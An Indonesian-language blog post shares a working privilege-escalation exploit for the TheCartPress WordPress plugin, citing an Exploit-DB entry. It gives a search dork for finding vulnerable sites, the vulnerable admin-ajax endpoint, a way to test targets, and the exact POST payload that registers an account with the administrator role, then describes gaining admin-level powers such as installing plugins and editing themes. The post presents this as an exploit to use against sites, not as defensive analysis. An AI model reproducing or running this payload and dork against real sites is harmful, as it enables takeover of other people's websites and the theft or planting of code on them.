WordPress Thecartpress Privilege Escalation

Baca Juga

Selamat datang kembali di blog yang tidak terurus ini. Hari ini ngadmin cuma mau share exploit WordPress lagi, yaitu WordPress Plugin TheCartPress Privilege Escalation. Langsung aja simak dibawah ini.

Referensi: https://www.exploit-db.com/exploits/50378
Exploit url: /wp-admin/admin-ajax.php?action=tcp_register_and_login_ajax
Dork: inurl:/wp-content/plugins/thecartpress

Masukan url nya ntuk melihat apakah websitenya bisa di eksploitasi atau tidak. Jika ada teks 'Username is required' baik dalam bahasa inggris atau bahasa apapun, kemungkinan bisa di eksploitasi.

Kirim post data berikut ke url /wp-admin/admin-ajax.php?action=tcp_register_and_login_ajax untuk registrasi dan menaikan role.

tcp_new_user_name=nxtrrr&tcp_new_user_pass=nstr&tcp_repeat_user_pass=nstr&tcp_new_user_email=nstr@nstr.com&tcp_role=administrator

Disini saya menggunakan curl untuk mengirim request nya

Jika sukses, akan blank seperti gambar diatas. Setelah itu tinggal login ke halaman loginnya, yaitu di wp-login.php

Jika kita lihat role kita pada dashboard adminnya, role kita hanyalah subscriber atau member biasa bukan administrator.

Tapi kita memiliki hak atau privilege yang sama seperti administrator seperti add plugins, add/edit themes dll karena kita sudah menaikan privilege pada tcp_role yang ada pada post data yang dikirim tadi.

Cukub sampai sini saja artikel hari ini, terimakasih sudah mau membaca.